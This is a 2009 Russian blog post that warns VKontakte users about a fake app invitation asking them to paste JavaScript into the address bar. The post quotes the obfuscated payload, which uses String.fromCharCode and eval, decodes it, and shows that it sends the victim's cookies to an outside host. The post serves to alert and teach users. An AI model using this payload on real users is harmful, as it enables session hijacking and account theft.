В Контакте можно устроить XSS
Расскажу одну историю про в Контакте а потом сделаю выводы.
Вот она:
Получаю как всегда приглашение установить новое супер-пупер классное приложение.
Вижу там инструкцию, как это все добро наладить:
Вот эта самая строка
javascript:page=String.fromCharCode(105, 109, 103, 61, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 59, 105, 109, 103, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 118, 112, 111, 112, 107, 117, 46, 111, 114, 103, 47, 115, 117, 112, 47, 115, 46, 112, 104, 112, 63, 113, 61, 39, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59);
eval(page);
alert(unescape("%u041D u0435 %20 %u0443 %u0434 %u0430 %u0435 %u0442 %u0441 %u044F %20 %u0432 %u044B %u043F %u043E %u043B %u043D %u0438 %u0442 %u044C %20 %u0434 %u0435 %u0439 %u0441 %u0442 %u0432 %u0438 %u0435 %21"));
Что мы здесь видим? Исполняемый ЯВА код, чтобы юзверь не понял строка закодирована функцией "String.fromCharCode" которая из массива чисел получает обычную строку вида
img=new Image();
img.src='http://vpopku.org/sup/s.php?q='+document.cookie;
Легко понять зачем строку закодировали, какойто адрес vpopku.org не вызывает доверия и правильно, ведь туда передаются ваши куки с логином и паролем.
Ну а дальше просто выдается сообщение что "ничего не получилось" и пользователь особо не расстроившись закрывает горе приложение как ни в чем не бывало.
P.S Социальная инженерия в купе с тупыми пользователями показывает отличные результаты. Никогда приличное приложение не будет напрягать своих драгоценных пользователей извращаться с ЯВА кодами и прочей херней.
- Баги к игре крокодил рисуй и угадывай ...
- Новые куки в Контакте Всем привет. Совсем недавно описал самый...
Дорогие читатели и посетители сайта! Если вам понравился материал или наш сайт, то отправьте на него ссылку своим друзьям в контакте или просто товарищам, пусть и они посмотрят страницу " В Контакте можно устроить XSS". Спасибо что уделили нам время!
Варианты ссылок:Запись опубликованна: августа 30, 2009 в рубрике Баги
